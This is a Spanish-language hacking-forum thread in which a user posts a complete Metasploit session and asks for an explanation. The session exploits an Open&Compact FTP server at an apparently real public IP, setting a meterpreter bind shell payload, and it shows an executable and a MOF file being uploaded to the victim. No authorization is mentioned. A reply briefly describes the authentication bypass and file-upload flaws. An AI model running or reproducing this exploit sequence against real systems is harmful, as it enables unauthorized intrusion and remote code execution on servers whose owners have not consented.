elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Explicacion de un exploit.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Explicacion de un exploit.  (Leído 4,003 veces)
condordkl

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Explicacion de un exploit.
« en: 9 Septiembre 2014, 16:12 pm »

Buenas.. Ayer desde Armitage corriendo el sistema operativo de Kali linux, ejecute un Exploit para un servidor que corría el servicio de FTP, el tema es que sinceramente no entiendo el funcionamiento del mismo. Espero que alguien me pueda explicar. GRACIAS!

msf > use exploit/windows/ftp/open_ftpd_wbem
msf exploit(open_ftpd_wbem) > set SSLVersion SSL3
SSLVersion => SSL3
msf exploit(open_ftpd_wbem) > set LHOST 192.168.0.11
LHOST => 192.168.0.11
msf exploit(open_ftpd_wbem) > set RPORT 21
RPORT => 21
msf exploit(open_ftpd_wbem) > set LPORT 15498
LPORT => 15498
msf exploit(open_ftpd_wbem) > set SSL 0
SSL => 0
msf exploit(open_ftpd_wbem) > set SRVPORT 8080
SRVPORT => 8080
msf exploit(open_ftpd_wbem) > set RHOST (IP DEL SERVIDOR)
RHOST => 190.183.59.228
msf exploit(open_ftpd_wbem) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(open_ftpd_wbem) > set TARGET 0
TARGET => 0
msf exploit(open_ftpd_wbem) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf exploit(open_ftpd_wbem) > set PATH C:/WINDOWS/
PATH => C:/WINDOWS/
msf exploit(open_ftpd_wbem) > exploit -j
  • Exploit running as background job.
  • Started bind handler
  • Server started.
  • (IPSERVIDOR):21 - Trying to upload ctBqvLiiKaTFnm.exe
  • (IPSERVIDOR):21 - Set binary mode
  • (IPSERVIDOR)21 - Set active mode "192,168,0,11,31,144"
  • (IPSERVIDOR):21 - Upload successful
  • (IPSERVIDOR):21 - Trying to upload dwEoqTj.mof
  • (IPSERVIDOR):21 - Set binary mode
  • (IPSERVIDOR):21 - Set active mode "192,168,0,11,31,144"
  • (IPSERVIDOR):21 - Upload successful[/b][/i]
En línea

xxthependejoxx

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: Explicacion de un exploit.
« Respuesta #1 en: 1 Enero 2015, 22:43 pm »

Este módulo explota múltiples vulnerabilidades encontradas en el servidor abierto y compacto FTP . El software contiene una vulnerabilidad de omisión de autenticación y una vulnerabilidad de carga de archivos arbitraria que permite a un atacante remoto escribir archivos arbitrarios al sistema de archivos , siempre y cuando haya al menos un usuario que tenga permiso .
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Exploit] Error al Compilar exploit (Solucionado)
Bugs y Exploits
moikano→@ 4 5,154 Último mensaje 10 Noviembre 2011, 15:28 pm
por moikano→@
[Exploit] me sale errror al intentar compilar el exploit half-nelson
Bugs y Exploits
moikano→@ 6 11,165 Último mensaje 24 Noviembre 2011, 22:46 pm
por moikano→@
Explicacion de un exploit. ayuda.
Hacking
condordkl 0 2,080 Último mensaje 7 Septiembre 2014, 16:38 pm
por condordkl
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines